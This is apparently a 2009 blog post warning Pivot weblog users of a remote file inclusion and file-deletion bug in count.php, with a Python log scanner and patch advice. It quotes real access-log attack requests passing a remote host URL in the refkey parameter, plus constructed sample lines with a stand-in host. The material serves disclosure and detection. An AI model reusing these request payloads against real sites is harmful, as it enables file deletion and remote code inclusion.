Remotely exploitable vulnerability found in Pivot v1.40.6!

Mar 19, 2009

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. An attacker can use it to delete files from your web content directory, and if the register_globals PHP setting is enabled, it can also be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 200 61 "-" "Mozilla/5.0"
a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET /pivot//extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
a.b.c.d - - [19/Mar/2009:17:19:23 -0400] "GET /pivot/archive.php?c=images&t=my_frontpage.html//extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"
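If you want to check your own access logs for the same pattern, the following scanner is an added example (my own illustration, not part of the original post or of Pivot) that parses Apache combined-format lines like the ones above and flags requests to the count.php path whose refkey parameter is an absolute URL. The sample log lines, the IP addresses and the hostile.example host are constructed; the only values taken from the post are the count.php path and the refkey parameter name.

```python
"""Scan Apache access-log lines for requests against the Pivot
extensions/bbclone_tools/count.php refkey bug.
Added example; not code from the post or from the Pivot project."""
import re
from urllib.parse import unquote

# Apache "combined" log format, the same layout as the excerpt in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Path named in the advisory (relative; installs may live under /pivot/ etc.).
VULN_PATH = "extensions/bbclone_tools/count.php"
# The refkey value runs up to the next '&' or the end of the target.
REFKEY_RE = re.compile(r"[?&]refkey=([^&]*)", re.IGNORECASE)
SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(target):
    """Classify one request target.

    Returns (kind, remote_url):
      'rfi'   - count.php requested with a refkey that is an absolute URL
      'probe' - count.php requested with any other refkey (or none)
      None    - request does not touch count.php
    """
    decoded = unquote(target)
    # Collapse repeated slashes so '//extensions/...' still matches the path.
    if VULN_PATH not in re.sub(r"/{2,}", "/", decoded):
        return None, None
    m = REFKEY_RE.search(decoded)
    if m and SCHEME_RE.match(m.group(1)):
        return "rfi", m.group(1).rstrip("?")
    return "probe", None


def scan(lines):
    """Return one finding dict per request that touches count.php."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind, url = classify(rec["target"])
        if kind is None:
            continue
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "kind": kind,
            "remote_url": url,
            "status": int(rec["status"]),
            # A 200 means the script at that path actually answered; a 404 or
            # 301 means the guessed path was wrong and this copy was not hit.
            "reached": rec["status"] == "200",
        })
    return findings


# Constructed sample log (documentation-range IPs, invented hostile host),
# shaped like the three lines quoted in the post plus two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php'
    '?refkey=http://hostile.example/x.txt?? HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Mar/2009:17:19:22 -0400] "GET /pivot//extensions/bbclone_tools/count.php'
    '?refkey=http://hostile.example/x.txt?? HTTP/1.1" 404 307 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/Mar/2009:17:19:23 -0400] "GET /pivot/archive.php?c=images&t=my_frontpage.html'
    '//extensions/bbclone_tools/count.php?refkey=http://hostile.example/x.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Mar/2009:18:02:10 -0400] "GET /extensions/bbclone_tools/count.php'
    '?refkey=archive HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [19/Mar/2009:18:05:44 -0400] "GET /pivot/archive.php?c=images HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan(source):
        hit = "HIT" if f["reached"] else "miss"
        print(f'{f["time"]} {f["ip"]} {f["kind"]:5} {hit} status={f["status"]} {f["remote_url"] or ""}')
```

Run it with the path to an access log as the first argument, or with no argument to see the constructed sample. A 'rfi' finding with status 200 is the case worth acting on: that copy of count.php answered the request, so check the web content directory for missing files and apply the patch from the post.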


The advisory and proof of concept attack may be found at milw0rm.com.

Pivot developer Hansfn has already responded to the bug by releasing a patch. A new release is planned for sometime tonight (he's in Norway, so allow for the time difference), but you can fix the bug yourself by replacing your /extensions/bbclone_tools/count.php file with this one from the official development code repository. All you have to do is rename the old count.php file, download the new one from the above link (which I copied from Hansfn's post in the forums), and you're good to go.